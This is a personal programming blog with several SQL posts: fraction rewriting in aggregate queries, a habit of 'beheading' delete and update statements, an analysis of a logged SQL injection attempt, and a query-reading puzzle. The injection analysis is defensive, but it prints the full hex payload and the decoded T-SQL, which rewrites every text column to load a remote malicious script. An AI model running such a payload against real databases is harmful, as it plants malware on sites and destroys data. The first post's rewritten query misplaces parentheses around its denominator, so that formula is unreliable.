Partial fractions in SQL queries

I never thought my maths training would come in handy again. I was working on a financial report, and one of the requirements was to have a particular calculated value show up. The formula didn’t make sense to me, but it was a business/financial logic requirement, so I just dealt with it.

So here’s the core of the problem (specific values had been changed):

select sum(A)/sum(B) - 0.7 from sometable

where “A” and “B” are columns of the database table “sometable”.

So what’s the problem? That select query won’t run. Or at least it didn’t run from a Sybase database (or was it an SQL Server database?). I’m not saying it ran but the value was wrong. I mean it didn’t even execute. Just in case you asked, “A” and “B” are numeric data columns so the sum function will work.

I don’t know how I came up with the idea of using partial fractions. Given that only 0.08%* of staff in the entire office building had maths background, and I probably made up the entire 0.08%, I didn’t have anyone to bounce ideas off of and be told “How about you try using partial fractions on that, Vincent?”

(* a completely made up statistic)

Anyway, I tried using partial fractions, and it worked. Now in partial fractions, you typically deal with decomposing a fraction into 2 or more fractions. Here, we’re combining fractions into 1 fraction. Let me show you.

sum(A)/sum(B) – 0.7
= sum(A)/sum(B) – 7/10
= ( 10*sum(A) – 7*sum(B) ) / 10*sum(B)

If I remember correctly, this (equivalent) SQL query will work:

select ( 10*sum(A) - 7*sum(B) ) / 10*sum(B) from sometable

I’m not a database expert. If you know why that works but not the original (and more direct) version, leave a comment.

[UPDATE: A commenter told me that complicated maths functions don’t work on aggregates. The sum(A) result is an aggregated result. Apparently sum(A)/sum(B) is too complicated. Oh well…]

As part of that same programming task, I had to deal with another similar problem:

select 50 * (sum(A)/sum(B) - 0.7) from sometable

That SQL query also didn’t run. So here’s the partial fraction combining process:

50 * (sum(A)/sum(B) – 0.7)
= 50*sum(A)/sum(B) – 35
= ( 50*sum(A) – 35*sum(B) ) / sum(B)

Alternatives

Now I know there’s another option. I could get sum(A) and sum(B) individually, and then do the required calculation in code (C# code as opposed to database SQL code. I was dealing with ASP.NET then).

After considering my options, I decided to leave all the calculations at the database side. This makes the ASP.NET code “cleaner”. Then I only have to deal with one return value (instead of 2, sum(A) and sum(B)), and I can bind it directly to my database objects for display on the web browser.

Also, there were where (and group-by? Can’t remember…) clauses in the SQL query. I didn’t know if I obtained sum(A) and sum(B) individually (even if they were in the same query) that that will affect their values. I decided to play it safe, and just get it all in one resulting value from the same query.

I didn’t check for efficiency. It wasn’t an oft-used report, so the code execution won’t be run frequently enough to matter.

But if you’re curious enough to do some tests, go ahead. If you then want to share your results, I’d very much appreciate it too.

Chop off their heads

He looked cautiously around, examining every little detail in the room. Each step he took was slow and calculating. His eyes stared at the space above the floor, as if he could see the passing of his quarry through that very space. Raising his right arm, he negligently rested the head of a blood-stained axe upon his shoulder.

He stood still. A drop of blood dripped from the axe for what seemed an eternity, and splattered the floor. He turned, and light glinted off the axe where it wasn’t bloody. A gasp escaped from the closet. He grinned, and shrugged the axe onto both his hands.

He’s cold-hearted. He’s cruel. He’s a murderer.

Axe on chopping block
[image by Geoffery Holman]

No, I’m not writing a horror story. That wasn’t quite scary enough. Although what I’m going to tell you is frightening enough… It was a dark and stormy night… uh…

It was some data patching task. I was to delete some data from a table. I entered the SQL statement

delete from ImportantTable

and promptly executed that statement without providing the where clause!

Oh in the name of all that is good! My heart was pounding like I just finished running a marathon. My hands started sweating. I felt a heat spreading from my neck to my head. “What have I done!”

Luckily, I was using TOAD, a user interface for accessing Oracle databases. And in Oracle, as much as I hate it, any changes to database tables are not committed till you specify it so. There’s a commit button in TOAD. You can also type in “commit” and execute that.

So what I did was roll the changes back, with a handy “rollback” button. Whew…

Like I said before, I prefer any SQL statement I execute to be, you know, really executed. I’ve had experiences where I was debugging my web application and was wondering why the data wasn’t refreshed. The select query using TOAD returned the correct set of data. Why wasn’t the web application doing so too? Because the changes in the database weren’t committed. A waste of 2 hours of my life…

But that’s with Oracle. The other databases aren’t so forgiving. But I like that. Anyway, from then on, I’m very careful about executing update, insert and delete statements.

Still, that wasn’t enough for my paranoid mind, oh no no no. What if I need to have several statements on screen, and a few of them are updates and deletes? Perhaps you would suggest commenting them out. Well, in Query Analyzer (of SQL Server), all you need to do is highlight the statement and you can execute only the highlighted section. If you don’t highlight the commenting syntax (2 dashes or 2 forward slashes), the statement gets executed.

Well, this won’t do at all. So I came up with a fail-safe method; I chopped off the heads of any SQL statement performing “dangerous” operations. So all my “dangerous” statements look like this:

nsert into ImportantTable
values('CODE0001','Very important code')

pdate AnotherImportantTable
set id_desc='An alternative description'
where id_code='IMPT0001'

elete from SuperImportantTable
where price < 500

I add the appropriate header alphabet when I'm going to execute the statement. After execution, I lop the header alphabet again. This leaves the statement still on screen so I know what I did. And in the unfortunate event that I accidentally execute the entire statement when I wasn't supposed to, the execution will fail, because the statement isn't properly formed.

So that's my method of handling SQL statements. When in doubt, chop off their heads first.

Hexed SQL – Analysis of a hack attempt

A few days ago, I was browsing through my web site logs. I was scrolling along when I saw an interesting entry (warning, long horizontal scrolling ahead. Please click through to post for easier reading):

/2008/07/15/are-you-malleable-code-editor/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S)

I thought that looked peculiar, but didn’t think much of it. It wasn’t until the next day that I felt that was a hack attempt. Yeah, my spider sense wasn’t doing very well…

So I took a closer look at it. From the keywords “DECLARE”, “CHAR(4000)”, “SET”, “CAST” and “EXEC”, I gathered this might be an SQL statement. But what’s the long string of characters doing?

Notice the “0x” in the CAST command. Hmm… hexadecimal? To prove this, I wrote a mini program:

StreamWriter sw = new StreamWriter("vince.txt");
string s = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72";
int i;
char c;
for (i = 0; i < s.Length; i += 2)
{
    c = Convert.ToChar(Convert.ToInt32(string.Format("0x{0}{1}", s[i], s[i + 1]), 16));
    sw.Write(c);
}
sw.WriteLine();
sw.Close();

That might not be the best way to manipulate hexadecimal, but you should definitely not follow this example.

Lo and behold, I got this (reformatted for legibility):

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

It was a chunk of SQL statements in hexadecimal! So, let's look at it more closely. Let's start with this part:

select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

sysobjects and syscolumns are system database tables. This automatically rules out Oracle as the database, since Oracle uses all_tables and all_tab_columns. MySQL uses INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS respectively.

That leaves me with Sybase and SQL Server, the other 2 databases that I'm familiar with. Then I saw the query uses xtype. Aha! Sybase's sysobjects table doesn't have the xtype column; it only has the type column!

And so, I deduced that this was probably an attack on web sites running on SQL Servers.

Let's look at the query again. This part a.xtype='u' in the where clause searches for user tables (or tables created by the user or associated applications). This part:

b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167

needs a little more explanation. My digging into the innards of syscolumns tells me that 99, 35, 231 and 167 corresponds to ntext, text, nvarchar, varchar respectively.

Hmm... those 4 look familiar... Oh right, they're data types for storing text in databases. I have a theory as to why char and nchar are not included, but let's focus on the query first.

So in English, the query retrieves all columns of text data type of all user-created database tables. Then in the while loop, an update command in executed. Basically, it updates all the text columns in all the user-created tables to a "certain value". Let's look at this "certain value" (yes, this is THE HACK), shall we?

THE HACK starts with two single quotes, so it becomes just one single quote because of the SQL escape. Then it ends with double quotes and a greater than sign. Huh? Then there's a </title> end tag. This implies there's a starting title tag somewhere.

From this, I deduce that the hacker is assuming (or hoping) one of those text columns will be used in the title tag. This implies that the text columns are assumed to be of moderate length. char and nchar types are not usually used for these types of data, so they're left out (or the hacker didn't think they're worthy). At least that's my theory...

Moving on, we see that there's a script tag. Isn't there always? *smile* The Javascript file comes from a dubious web site from China, based on the web site address. Yes, I've anonymised it so the actual dubious site's address isn't shown (to prevent giving power to the hacker and to lower the chances of search engines banning me). You're welcome to use the C# code above to decipher the chunk of hexadecimal and find out yourself. But please, don't go to that site!

Now I don't quite understand what's with the where clause in the update statement in the exec command. Why didn't the hacker simply update all the columns instead of adding a where clause search filter? It ends up the same anyway... Perhaps it's to mix up the encoded hexadecimal so it's not similar to past attempts...

Anyway, basically THE HACK updates text columns such that if one of the text columns is used in the title tag, the web page loads the malicious Javascript and ends rendering the rest of the page. I have no idea what the Javascript file will do, and I don't intend to find out. The additional damage is the lost of data in the text columns, which is probably not as fatal as the Javascript.

And that's the end of my analysis. I hope that even if it's not relevant to you, you've learnt something from the thought processes that go into this hack investigation.

Please ConvertToEnglish() – Obscure SQL

Sometimes you come across a simple SQL statement. Yet you’re confounded by the reasoning behind it. You think, “What is this trying to do?!”

Never had that experience before? Well, here’s your chance. Here’s a heavily anonymised version:

select max(is_active) from customers where customer_id = 'ABC'

And here’s the accompanying database table named “customers”.

customer_id customer_name is_active
ABC ABC Pte Ltd N
ABC ABC Corp N
ABC ABC Corporation Y
PQR PQR Company Y
XYZ XYZ Company N
XYZ XYZ MegaCorp N

Study both the SQL statement and the data in the database table. Then tell me what you think is the business logic behind the SQL statement.

What I mean is, suppose some manager needs some information. And the SQL statement is part of the solution to obtain that information. What does that manager need to know?

Need some help? Here’s an equivalent version:

select min(customer_status) from customers where customer_id = 'ABC'
customer_id customer_name customer_status
ABC ABC Pte Ltd H
ABC ABC Corp H
ABC ABC Corporation C
PQR PQR Company C
XYZ XYZ Company H
XYZ XYZ MegaCorp H

This entire exercise is to train you to decipher existing logic and data with very little help or documentation.

Bonus points: What do you think the values for the columns “is_active” and “customer_status” stand for?